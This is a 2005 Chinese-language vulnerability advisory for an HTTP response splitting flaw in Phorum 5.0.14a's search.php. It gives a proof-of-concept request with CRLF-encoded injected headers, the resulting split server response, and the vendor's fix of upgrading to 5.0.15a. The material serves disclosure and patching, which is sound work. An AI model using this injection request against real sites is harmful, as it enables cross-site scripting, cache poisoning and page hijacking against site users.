Phorum HTTP响应拆分漏洞
发布日期:2005-03-23
更新日期:2005-03-23
受影响系统:Phorum Phorum 5.0.14a
不受影响系统:Phorum Phorum 5.0.15a
描述:
BUGTRAQ ID:
12869
Phorum是一款基于PHP的WEB论坛程序,可在Linux和Unix操作系统下使用,也可在Microsoft Windows操作系统下使用。
由于没能正确的验证传送给Location参数的输入,攻击者可能向HTTP首部中注入恶意的字符。这可能导致在受影响站点的用户浏览器会话中执行任意HTML和脚本代码,进而展开各种攻击,如跨站脚本、破坏Web或浏览器缓存、劫持页面等。
<*来源:Alexander Anisimov (
anisimov@ptsecurity.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=111151651621097&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
请求:
http://[server]/phorum5/search.php?forum_id=0&search=1&body=%0d%0aContent-Length:%200% \
0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%203 \
4%0d%0a%0d%0a<html>Scanned by \
PTsecurity</html>%0d%0a&author=1&subject=1&match_forum=ALL&match_type=ALL&match_dates= \
30
结果:
HTTP/1.1 302 Found
Date: Tue, 01 Mar 2005 12:33:53 GMT
Server: Apache/1.3.31 (Unix) PHP/4.3.10
X-Powered-By: PHP/4.3.10
Location: http://[server]/phorum5/search.php?0,search=1,page=1,match_type=ALL,match_da \
tes=30,match_forum=ALL,body=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34
<html>Scanned by PTsecurity</html>
,author=1,subject=1
Connection: close
Content-Type: text/html
<...>
建议:
厂商补丁:
Phorum
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载5.0.15:
http://phorum.org/story.php?48
http://phorum.org/downloads/phorum-5.0.15a.tar.gz浏览次数:3130
严重程度:0(网友投票)
